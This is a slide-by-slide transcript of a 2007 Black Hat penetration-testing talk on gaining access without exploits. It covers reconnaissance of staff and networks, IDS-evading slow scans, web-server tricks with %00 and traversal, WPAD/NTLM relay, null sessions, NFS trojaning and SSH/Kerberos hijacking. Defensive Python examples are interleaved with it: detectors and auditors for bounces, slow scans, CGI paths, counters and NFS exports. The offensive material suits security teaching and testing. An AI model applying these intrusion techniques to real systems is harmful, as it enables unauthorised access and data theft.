This document discusses tactics for penetration testing networks without using exploits. It advocates targeting vulnerabilities in applications, processes, users, and trust relationships. Several discovery and profiling techniques are presented, including using tools to identify personnel and their access, mapping networks through DNS and port scans, finding applications through slow targeted scans, and monitoring processes and client applications to find entry points. The document suggests an opportunistic approach of expanding the scope of tests to gain access to data through any available means.
Tactical Exploitation - hdm valsmith
1. Tactical Exploitation
"the other way to pen-test"
hdm / valsmith
Black Hat USA 2007
Las Vegas – August 2007
2. who are we ?
• H D Moore <hdm [at] metasploit.com>
  BreakingPoint Systems || Metasploit
• Valsmith <valsmith [at] metasploit.com>
  Offensive Computing || Metasploit
3. why listen ?
• A different approach to pwning
• Lots of fun techniques, new tools
• Real-world tested ;-)
4. what do we cover ?
• Target profiling
• Discovery tools and techniques
• Exploitation
• Getting you remote access
5. the tactical approach
• Vulnerabilities are transient
• Target the applications
• Target the processes
• Target the people
• Target the trusts
• You WILL gain access.
6. the tactical approach
• Crackers are opportunists
• Expand the scope of your tests
• Everything is fair game
• What you don't test...
• Someone else will!
7. the tactical approach
• Hacking is not about exploits
• The target is the data, not r00t
• Hacking is using what you have
• Passwords, trust relationships
• Service hijacking, auth tickets
8. personnel discovery
• Security is a people problem
• People write your software
• People secure your network
• Identify the meatware first
9. personnel discovery
• Identifying the meatware
  • Google
  • Newsgroups
• SensePost tools
• Evolution from Paterva.com
10. personnel discovery
• These tools give us:
  • Full names, usernames, email
  • Employment history
  • Phone numbers
  • Personal sites
12. personnel discovery
• Started with company and jobs
• Found online personnel directory
• Found people with access to data
• Found resumes, email addresses
• Email name = username = target
13. personnel discovery
• Joe Targetstein
• Works as lead engineer in semiconductor department
• Email address joet@company.com
• Old newsgroup postings show joet@joesbox.company.com
• Now we have a username and a host to target to go after semiconductor information
14. network discovery
• Identify your target assets
• Find unknown networks
• Find third-party hosts
• Dozens of great tools...
• Let's stick to the less-known ones
15. network discovery
• The overused old busted
• Whois, Google, zone transfers
• Reverse DNS lookups
16. network discovery
• The shiny new hotness
• Other people's services
• CentralOps.net, DigitalPoint.com
• DomainTools.com
• Paterva.com
19. network discovery
• What does this get us?
• Proxied DNS probes, transfers
• List of virtual hosts for each IP
• Port scans, traceroutes, etc
• Gold mine of related info
20. network discovery
• Active discovery techniques
• Trigger SMTP bounces
• Brute force HTTP vhosts
• Watch outbound DNS
• Just email the users!
21. network discovery
Received: from unknown (HELO gateway1.rsasecurity.com)
(216.162.240.250)
by [censored] with SMTP; 28 Jun 2007 15:11:29 -0500
Received: from hyperion.rsasecurity.com by
gateway1.rsasecurity.com
via smtpd (for [censored]. [xxx.xxx.xxx.xxx]) with
SMTP; Thu, 28 Jun 2007 16:11:29 -0400
by hyperion.na.rsa.net (MOS 3.8.3-GA)
To: user@[censored]
Subject: Returned mail: User unknown (from [10.100.8.152])
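Reading the slide's bounce from the receiving side: an added example (not from the talk) that parses the Received: chain and Subject: of a constructed bounce modelled on the one above, with placeholder names, and lists what it gives away, so a mail admin can check their own gateways the same way.

```python
"""Audit what an SMTP bounce leaks about the internal mail path.

Added example (not from the original slides): the Received: chain and Subject:
of a bounce are parsed the way an outsider would read them, to show which
hostnames, RFC 1918 addresses and software banners a bounce gives away.
"""
import ipaddress
import re
from email import message_from_string

# Constructed bounce, modelled on the slide's example; names are placeholders.
SAMPLE_BOUNCE = """\
Received: from unknown (HELO gateway1.example.com) (198.51.100.250)
  by mx.recipient.example with SMTP; 28 Jun 2007 15:11:29 -0500
Received: from hyperion.example.com by gateway1.example.com
  via smtpd (for mx.recipient.example [203.0.113.7]) with SMTP;
  Thu, 28 Jun 2007 16:11:29 -0400
Received: from mailstore (mailstore.corp.example.internal [10.100.8.152])
  by hyperion.na.example.net (MOS 3.8.3-GA)
To: user@recipient.example
Subject: Returned mail: User unknown (from [10.100.8.152])

This is a constructed bounce body.
"""

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# dotted name whose last label is alphabetic (so IPs and version strings are skipped)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
# "(MOS 3.8.3-GA)": a parenthesised product name followed by a version string
BANNER_RE = re.compile(r"\(([A-Za-z][A-Za-z0-9-]* \d+(?:\.\d+)+(?:-[A-Za-z0-9]+)?)\)")


def is_rfc1918(text):
    """True for addresses in the private ranges, not for documentation nets."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return False
    return any(addr in net for net in RFC1918)


def audit_bounce(raw):
    """Return the hostnames, private IPs and banners visible in a bounce."""
    msg = message_from_string(raw)
    # fold continuation lines so each Received: header is one line of text
    headers = [re.sub(r"\s+", " ", h) for h in msg.get_all("Received", [])]
    headers.append(msg.get("Subject", ""))
    hosts, private_ips, banners = set(), set(), set()
    for h in headers:
        hosts.update(m.group(0).lower() for m in HOST_RE.finditer(h))
        private_ips.update(ip for ip in IPV4_RE.findall(h) if is_rfc1918(ip))
        banners.update(BANNER_RE.findall(h))
    return {
        "hostnames": sorted(hosts),
        "private_ips": sorted(private_ips),
        "banners": sorted(banners),
    }


if __name__ == "__main__":
    for key, values in audit_bounce(SAMPLE_BOUNCE).items():
        print(f"{key}: {values}")
```

Anything in the output that is not meant to be public (internal hostnames, the 10.x address, the server banner) is what the slide's technique collects; the fix is on the gateway that rewrites or strips those headers before the bounce leaves.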
22. application discovery
• If the network is the toast...
• Applications are the butter.
• Each app is an entry point
• Finding these apps is the trick
23. application discovery
• Tons of great tools
• Nmap, Amap, Nikto, Nessus
• Commercial tools
24. application discovery
• Slow and steady wins the deface
• Scan for specific port, one port only
• IDS/IPS can't handle slow scans
• Ex. nmap -sS -P0 -T 0 -p 1433 ips
25. application discovery
• Example target had custom IDS to detect large # of host connections
• Standard nmap lit up IDS like XMAS
• One port slow scan never detected
• Know OS based on 1 port (139/22)
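What the slide's custom IDS missed, as an added example that is not from the talk: the same constructed flow records are run through a short-window connection-rate rule and a long-window distinct-destination rule, and the one-port slow scan only trips the latter. Addresses and timestamps are made up.

```python
"""Why a per-minute connection-rate IDS misses a one-port slow scan.

Added example, not from the original slides: the same flow records are run
through a short-window rate rule (what the slide's custom IDS did) and a
long-window distinct-destination rule; the slow scanner only trips the latter.
All addresses and flow records below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

BASE = datetime(2007, 8, 1, 0, 0, 0)


def _flow(offset, src, dst, dport=1433):
    return (BASE + offset, src, dst, dport)


# Constructed flow log: (timestamp, src, dst, dport)
SAMPLE_FLOWS = (
    # a default-speed scan: 30 hosts in three seconds
    [_flow(timedelta(milliseconds=100 * i), "203.0.113.5", f"10.0.0.{i + 1}") for i in range(30)]
    # a one-port slow scan: 12 hosts, one probe every ten minutes
    + [_flow(timedelta(minutes=10 * i), "198.51.100.9", f"10.0.0.{i + 1}") for i in range(12)]
    # a legitimate client talking to one database server all day
    + [_flow(timedelta(minutes=5 * i), "10.0.0.50", "10.0.0.200") for i in range(200)]
)


def sources_touching_many_hosts(flows, window_seconds, threshold, port=1433):
    """Sources that reached >= threshold distinct hosts on `port` inside any
    sliding window of window_seconds."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in sorted(flows):
        if dport == port:
            by_src[src].append((ts, dst))
    window = timedelta(seconds=window_seconds)
    alerts = set()
    for src, events in by_src.items():          # events are time-ordered
        recent = deque()
        for ts, dst in events:
            recent.append((ts, dst))
            while ts - recent[0][0] > window:   # drop events outside the window
                recent.popleft()
            if len({d for _, d in recent}) >= threshold:
                alerts.add(src)
                break
    return alerts


def rate_rule(flows):
    """The slide's style of rule: 20 distinct hosts within one minute."""
    return sources_touching_many_hosts(flows, window_seconds=60, threshold=20)


def slow_scan_rule(flows):
    """Same idea, but the per-source destination set is kept for a whole day."""
    return sources_touching_many_hosts(flows, window_seconds=86400, threshold=10)


if __name__ == "__main__":
    print("rate rule     :", sorted(rate_rule(SAMPLE_FLOWS)))
    print("slow-scan rule:", sorted(slow_scan_rule(SAMPLE_FLOWS)))
```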
26. application discovery
• Target had internal app for software licensing / distribution
• ~10,000 nodes had app installed
• A couple of hours with IDA/Ollydbg showed static Admin password in app's memory
• All accessible nodes owned, 0 exploits used
27. application discovery
• Web Application Attack and Audit Framework
  • W3AF: "Metasploit for the web"
• Metasploit 3 scanning modules
  • Scanning mixin
29. client app discovery
• Client applications are fun!
• Almost always exploitable
• Easy to fingerprint remotely
• Your last-chance entrance
30. client app discovery
• Common probe methods
• Mail links to the targets
• Review exposed web logs
• Send MDNs to specific victims
• Abuse all, everyone, team aliases
31. process discovery
• Track what your target does
• Activity via IP ID counters
• Last-modified headers
• FTP server statistics
32. process discovery
• Look for patterns of activity
• Large IP ID increments at night
• FTP stats at certain times
• Microsoft FTP SITE STATS
• Web pages being uploaded
• Check timestamps on images
33. process discovery
• Existing tools?
• None, really...
• Easy to script
  • Use "hping" for IP ID tracking
  • Use netcat for SITE STATS
34. process discovery
ftp.microsoft.com [node]
SITE STATS / Uptime: 47 days
ABOR : 2138 NOOP : 147379 SIZE : 76980
ACCT : 2 OPTS : 21756 SMNT : 16
ALLO : 32 PASS : 2050555100 STAT : 30812
APPE : 74 PASV : 2674909 STOR : 3035
CDUP : 5664 PORT : 786581 STRU : 3299
CWD : 388634 PWD : 179852 SYST : 175579
DELE : 1910 QUIT : 143771 TYPE : 3038879
FEAT : 2970 REIN : 16 USER : 2050654280
HELP : 470 REST : 31684 XCWD : 67
LIST : 3228866 RETR : 153140 XMKD : 12
MDTM : 49070 RMD : 41 XPWD : 1401
MKD : 870 RNFR : 58 XRMD : 2
MODE : 3938 RNTO : 2
NLST : 1492 SITE : 2048
35. process discovery
[Graph: IP ID monitoring of HACKER.COM; annotations: "<< backups run at midnight", "USA people wake up >>"]
36. 15 Minute Break
• Come back for the exploits!
37. re-introduction
• In our last session...
  • Discovery techniques and tools
• In this session...
  • Compromising systems!
38. external network
• The crunchy candy shell
• Exposed hosts and services
• VPN and proxy services
• Client-initiated sessions
39. attacking ftp transfers
• Active FTP transfers
• Clients often expose data ports
• NAT + Active FTP = Firewall Hole
• Passive FTP transfers
• Data port hijacking: DoS at least
• pasvagg.pl still works just fine :-)
40. attacking web servers
• Brute force vhosts, files, dirs
  http://www.cray.com/old/
• Source control files left in root
  http://www.zachsong.com/CVS/Entries
41. attacking web servers
• Apache Reverse Proxying
  GET /%00 HTTP/1.1
  Host: realhost.com
• Apache Dynamic Virtual Hosting
  GET / HTTP/1.1
  Host: %00/
42. load balancers
• Cause load balancer to "leak" internal IP information
• Use TCP half-close HTTP request
• Alteon ACEdirector good example
43. load balancers
• ACEdirector mishandles TCP half-close requests
• Behavior can be used as signature for existence of Load Balancer
• Direct packets from real webserver forwarded back to client (with IP)
44. cgi case study
• Web Host with 1000's of sites
• Had demo CGI for customers
• CGI had directory traversal
  www.host.com/cgi-bin/vuln.pl/../../cgi
• CGI executable + writable on every directory
• Common on web hosts!
45. cgi case study
• Enumerated:
  • Usernames
  • Dirs
  • Backup files
  • Other CGI scripts
  • VHOSTS
46. cgi case study
• Target happened to run Solaris
  • Solaris treats dirs as files
  • cat /dirname = ls /dirname
  http://www.host.com/cgi-bin/vuln.cgi/../../../../dirname%00.html
47. cgi case study
• Found CGI script names
• Googled for vulns
• Gained shell 100's of different ways
• Owned due to variety of layered configuration issues
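The two defects behind the case study above (traversal through PATH_INFO, and the %00 that truncates the appended extension) modelled next to a resolver that rejects both. This is an added example, not the slides' CGI; the document root, script and request paths are placeholders.

```python
"""The two CGI defects from the case study, and a resolver that rejects both.

Added example, not the slides' CGI: `flawed_resolve` models a script that
appends ".html" to PATH_INFO and hands the result to a C runtime that stops
at the first NUL byte (the slide's %00 trick), so "../" walks out of the
document root and "%00.html" discards the extension. `safe_resolve` decodes
first, refuses NUL bytes, normalises the path and requires the result to stay
inside the root. Document root and paths are placeholders.
"""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www/cgi-bin"   # placeholder document root


def flawed_resolve(doc_root, path_info):
    """Vulnerable: the appended ".html" is no protection once a NUL truncates it."""
    full = doc_root + unquote(path_info) + ".html"
    return full.split("\x00", 1)[0]        # what open(2) would actually see


def safe_resolve(doc_root, path_info):
    """Hardened: returns the file to serve, or None if the request is rejected."""
    decoded = unquote(path_info)
    if "\x00" in decoded:                  # a NUL never belongs in a request path
        return None
    root = posixpath.normpath(doc_root)
    # normpath collapses "." and ".." lexically; a real server should also
    # realpath() the result so a symlink cannot point back outside the root
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if not candidate.startswith(root + "/"):   # must be strictly inside the root
        return None
    return candidate + ".html"


# Requests modelled on the case study (constructed)
REQUESTS = [
    "/docs/readme",                          # legitimate
    "/../../cgi",                            # traversal out of the document root
    "/../../../../dirname%00.html",          # traversal plus NUL truncation
    "/docs/%2e%2e/%2e%2e/etc/passwd",        # URL-encoded traversal
]


def compare(doc_root, requests):
    """{request: (what the flawed script opens, what the safe one serves)}"""
    return {r: (flawed_resolve(doc_root, r), safe_resolve(doc_root, r)) for r in requests}


if __name__ == "__main__":
    for req, (flawed, safe) in compare(DOC_ROOT, REQUESTS).items():
        print(f"{req!r}\n  flawed -> {flawed}\n  safe   -> {safe}")
```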
48. attacking dns servers
• Brute force host names
• XID sequence analysis
  • BIND 9: PRNG / Birthday
  • VxWorks: XID = XID + 1
• Return extra answers in response
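A check for the two counters the slides lean on, the IP ID used for process discovery (slides 31 to 35) and the DNS XID above: an added example, not from the talk, that classifies a sample of 16-bit values as sequential, shared-counter or unpredictable and shows what a global IP ID counter gives away. Sample values are constructed; a weak PRNG like the BIND 9 case needs a proper statistical test, which this does not attempt.

```python
"""Check whether a 16-bit counter (IP ID or DNS transaction ID) is predictable.

Added example, not from the original slides: the talk reads IP ID gaps to
watch a host's activity and XID sequences to judge a resolver; this is the
audit a defender runs on samples from their own hosts to see whether they
leak that way. All sample values are constructed.
"""

MODULUS = 1 << 16  # both IP ID and DNS XID are 16-bit fields


def deltas(values, modulus=MODULUS):
    """Successive increments, taking wrap-around at 2^16 into account."""
    return [(b - a) % modulus for a, b in zip(values, values[1:])]


def classify(values, small=1024, modulus=MODULUS):
    """'sequential'    : every increment is exactly 1 (e.g. XID = XID + 1);
       'incrementing'  : a shared counter whose gaps reveal other traffic;
       'unpredictable' : gaps look random at this crude level of analysis
       (a weak PRNG, the slide's BIND 9 case, needs a real statistical test)."""
    d = deltas(values, modulus)
    if len(d) < 3:
        raise ValueError("need at least four samples")
    if all(x == 1 for x in d):
        return "sequential"
    if sum(1 for x in d if 0 < x < small) >= 0.9 * len(d):
        return "incrementing"
    return "unpredictable"


def leaked_packets(ip_ids, modulus=MODULUS):
    """For a host with one global incrementing IP ID, each probe reply moves
    the counter by one, so (gap - 1) packets went elsewhere in between."""
    return [x - 1 for x in deltas(ip_ids, modulus)]


# Constructed samples
XIDS_VXWORKS_STYLE = [65533, 65534, 65535, 0, 1, 2]          # XID = XID + 1, wrapping
IPID_GLOBAL_COUNTER = [1000, 1003, 1010, 1011, 1500, 1502]   # probe replies + other traffic
IPID_RANDOMISED = [0x8F3A, 0x12C4, 0xE771, 0x3B09, 0xA0D2, 0x5E17]


if __name__ == "__main__":
    for name, sample in [("VxWorks-style XID", XIDS_VXWORKS_STYLE),
                         ("global IP ID", IPID_GLOBAL_COUNTER),
                         ("randomised IP ID", IPID_RANDOMISED)]:
        print(f"{name:18}: {classify(sample)}")
    print("packets leaked between probes:", leaked_packets(IPID_GLOBAL_COUNTER))
```

A host or resolver that classifies as anything but unpredictable is the one the slides' techniques work against; per-destination or randomised IP IDs and a resolver with random XIDs close both channels.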
49. authentication relays
• SMB/CIFS clients are fun!
• Steal hashes, redirect, MITM
• NTLM relay between protocols
• SMB/HTTP/SMTP/POP3/IMAP
• More on this later...
50. social engineering
• Give away free toys
• CDROMs, USB keys, N800s
• Replace UPS with OpenWRT
• Cheap and easy to make
51. internal network
• The soft chewy center
• This is the fun part :)
• Easy to trick clients
52. netbios services
• NetBIOS names are magic
  • WPAD
  • CALICENSE
53. dns services
• Microsoft DNS + DHCP = fun
  • Inject host names into DNS
  • Hijack the entire network
  dhcpcd -h WPAD -i eth0
54. Hijacking NTLM
• Quickly own all local workstations
• Gain access to mail and web sites
• A new twist on "smbrelay2.cpp"
• Yes, it was released in 2001.
• Now implemented in Metasploit 3
55. Hijacking NTLM
1. MITM all outbound web traffic
• Cache poison the "WPAD" host
• Plain old ARP spoofing
• DHCP / NetBIOS + "WPAD"
• Run a rogue WiFi access point
• Manipulate TOR connections
56. Hijacking NTLM
2. Redirect HTTP requests to "intranet"
• WPAD + SOCKS server
• SQUID + transparent proxying
• 302 Redirect
57. Hijacking NTLM
3. Return HTML page with UNC link
• IE 5/6/7: <img src="\\ip\share\i.jpg">
• Firefox: mozicon-url:file:////ip/share/i.jpg
• Third-party plugins:
  • Adobe PDF Viewer
  • Windows Media Player
  • Microsoft Office
58. Hijacking NTLM
4. Accept SMB connection and relay
• Accept connection from the client
• Connect to the target server (or client)
• Ask target for Challenge Key
• Provide this Key to the client
• Allow the client to authenticate
59. Hijacking NTLM
5. Executing remote code
• Disconnect the client
• Use authenticated session
  • ADMIN$ + Service Control Manager
  • Access data, call RPC routines, etc
  • Access the remote registry
61. file servers
• "NAS appliances are safe and secure"
• Don't worry, the vendor sure doesn't
• Unpatched Samba daemons
  • Snap, TeraServer, OS X, etc.
• Inconsistent file permissions
• AFP vs NFS vs SMB
62. samba is awesome
• 1999 called, want their bugs back
• Remember those scary "NULL Sessions"
• Samba ENUM / SID2USR user listing
• Massive information leaks via DCERPC
  • Shares, Users, Policies
  • Brute force accounts (no lockout)
63. smb case study
• Old bugs back to haunt new boxes
• Found OS X box running SMB
• User sent mail touting OS X sec
• Previous scans had found vulns
• User: "false positive, it's OS X"
• Us: "Owned"
64. smb case study
• Performed Null Session
  net use \\osxsmb\ipc$ "" /user:""
• Enumerated users and shares
  • Brute forced several user accounts
  • Got shell, escalated to root
  • User: "but... but... it's OS X!"
65. samba vs metasploit
• Metasploit modules for Samba
• Linux (vSyscall + Targets)
• Mac OS X (PPC/x86)
• Solaris (SPARC,x86)
• Auxiliary PoCs
66. nfs services
• NFS is your friend
• Don't forget its easy cousin NIS
• Scan for port 111 / 2049
• showmount -e / showmount -a
• What's exported, who's mounting?
67. nfs services
• Exported NFS home directories
• Important target!
• If you get control
• Own every node that mounts it
68. nfs services
• If you are root on home server
• Become anyone (NIS/su)
• Harvest known_hosts files
• Harvest allowed_keys
• Modify .login, etc. + insert trojans
69. nfs services
• Software distro servers are fun!
• All nodes access over NFS
• Write to software distro directories
• Trojan every node at once
• No exploits needed!
70. file services
• Example: all nodes were diskless / patched
• Clients got software from NFS server
• We hacked the software server
• Using trust hijacking explained later
• Inserted trojaned GNU binaries
• 1000's of nodes sent us shells
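The showmount audit that slides 66 to 70 imply, written from the file-server owner's side: an added example, not from the talk, that parses constructed `showmount -e` and `showmount -a` output, flags exports open to every client, and for the home-directory and software-distribution paths the slides single out counts how many nodes a compromise of that export would reach. Host names, paths and the "sensitive prefix" list are placeholders.

```python
"""Audit NFS exports the way the slides suggest an attacker reads them.

Added example, not from the original slides: parses constructed `showmount -e`
and `showmount -a` output, flags exports open to every client, and for the
high-value paths the slides single out (home directories, software
distribution trees) counts how many nodes would be reached through them.
Host names and paths are placeholders.
"""

# Constructed `showmount -e nfs.example.internal` output
EXPORTS_OUTPUT = """\
Export list for nfs.example.internal:
/export/home      *
/export/software  10.0.0.0/255.255.255.0
/export/scratch   (everyone)
/export/backup    backup1.example.internal,backup2.example.internal
"""

# Constructed `showmount -a nfs.example.internal` output
MOUNTS_OUTPUT = """\
All mount points on nfs.example.internal:
ws01.example.internal:/export/home
ws02.example.internal:/export/home
ws03.example.internal:/export/home
ws01.example.internal:/export/software
ws02.example.internal:/export/software
backup1.example.internal:/export/backup
"""

WORLD = {"*", "(everyone)"}                               # client specs meaning "anyone"
SENSITIVE_PREFIXES = ("/export/home", "/export/software")  # assumed layout, adjust per site


def parse_exports(text):
    """{path: [client specs]} from showmount -e output; first line is the header."""
    exports = {}
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        path, _, clients = line.partition(" ")
        exports[path] = [c.strip() for c in clients.split(",") if c.strip()]
    return exports


def parse_mounts(text):
    """{path: set(clients)} from showmount -a output (client:path lines)."""
    mounts = {}
    for line in text.splitlines()[1:]:
        if ":" not in line:
            continue
        client, path = line.split(":", 1)
        mounts.setdefault(path.strip(), set()).add(client.strip())
    return mounts


def audit_exports(exports_text, mounts_text, sensitive=SENSITIVE_PREFIXES):
    """One finding per export: openness, value to an attacker, and blast radius."""
    exports, mounts = parse_exports(exports_text), parse_mounts(mounts_text)
    findings = []
    for path, clients in sorted(exports.items()):
        open_to_world = any(c in WORLD for c in clients)
        high_value = path.startswith(sensitive)
        if open_to_world and high_value:
            severity = "high"
        elif open_to_world or high_value:
            severity = "medium"
        else:
            severity = "low"
        findings.append({
            "path": path,
            "open_to_world": open_to_world,
            "high_value": high_value,
            "mounted_by": len(mounts.get(path, ())),  # nodes reached through this export
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in audit_exports(EXPORTS_OUTPUT, MOUNTS_OUTPUT):
        print(f"{f['severity']:6} {f['path']:18} world={f['open_to_world']!s:5} "
              f"mounted_by={f['mounted_by']}")
```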
71. trust relationships
• The target is unavailable to YOU
• Not to another host you can reach...
• Networks may not trust everyone
• But they often trust each other :)
72. trusts
• Deal with firewalls/TCP wrappers/ACLs
• Find a node that is accepted and own it
• People wrap Unix and leave Windows open
• Hack the Windows box and port forward past wrappers
73. trusts
• Example: mixed network with Unix wrapped
• Target Solaris homedir server
• Had auth credentials but couldn't reach port 22
• Found 1 vulnerable Windows box, owned / installed port forward to homedir port 22
74. Hijacking SSH
• Idea is to abuse legitimate users' access over SSH
• If user can access other systems, why can't you? (even without user's password)
• One time passwords? No problem!
• Intel gathering
75. Hijacking SSH
• Available tools
• Metalstorm ssh hijacking
  • Trojaned ssh clients
  • SSH master modes
• Don't forget TTY hijacking
• Appcap
  • TTYWatcher
• Who suspects a dead SSH session?
77. Hijacking Kerberos
• Kerberos is great for one-time authentication... even for hackers
• Idea is to become a user and hijack Kerberos tickets
• Gain access to other trusted nodes